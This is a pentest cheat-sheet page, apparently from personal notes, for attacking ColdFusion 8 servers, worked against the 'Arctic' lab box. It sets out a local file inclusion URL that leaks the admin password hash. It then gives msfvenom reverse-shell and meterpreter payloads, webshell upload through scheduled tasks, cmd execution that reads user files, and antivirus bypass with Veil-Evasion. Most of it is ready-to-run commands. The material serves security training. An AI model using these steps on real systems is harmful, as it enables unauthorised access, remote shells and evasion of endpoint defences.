Coldfusion

Basics

Local File Inclusion - Password Leak!

Coldfusion 8 CVE
https://www.exploit-db.com/exploits/14641/
Get the Password hash using LFI

http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Reverse Shell

If you get Admin into Coldfusion
You can upload a java reverse shell

Create:
msfvenom --list payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp

Share:
python -m SimpleHTTPServer
python3 -m http.server

Upload:
Coldfusion > Debugging > Scheduled Tasks
URL : http://$MyIP:8000/shell.jsp
Publish: Save output to file - Yes!
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
Submit & Run

Execute:
http://$IP:8500/CFIDE/shell.jsp 

Catch:
nc -nvlp 4444
whoami tolis!

Webshell

If you get Admin into Coldfusion
You could upload "cfexec.cfm"
https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html --bad link
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/cfm/cfExec.cfm
/usr/share/webshells/cfm/cfexec.cfm ..kali

vim cfexec.cfm
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://$MyIP:8000/cfexec.cfm
Publish: Save output to file - Yes!
\ColdFusion8\wwwroot\CFIDE\cfexec.cfm
Submit & Run

Execute:
http://$IP:8500/CFIDE/cfexec.cfm

Command: C:\windows\system32\cmd.exe
Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt

Browse : http://$IP:8500/CFIDE/output.txt
.. arctic\tolis
.. C:\Users\tolis
.. Flag!!
.. Windows Server 2008 R2 64-Bit

Reverse Executable

You may be able to upload a reverse executable
Avoid AV detection with Veil

----------------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.exe
\ColdFusion8\wwwroot\CFIDE\arctic.exe

msf > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.10.13.10
set RHOST 4444
RUN

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt
http://10.10.10.11:8500/CFIDE/output.txt
.. Found: 'arctic.exe'
.. BLOCKED by Antivirus

----------------------------------
Bypass Antivirus with veil-evasion

>  veil-evasion
>> list
>> choose '24'.. Powershell/meterpreter/rev_tcp
>> LHOST=$MyIP
>> LPORT=4444
>> generate
.. 'arctic'.. which makes 'arctic.bat'
cp arctic.bat .

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.bat
C:\ColdFusion8\wwwroot\CFIDE\arctic.bat

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat
May need to try this 2-3 Times.. but will work!!

MSF - Connected!

Other:

Also consider:
https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/

PreviousBlogs NextContent Management (CMS)

Last updated 2 years ago

Was this helpful?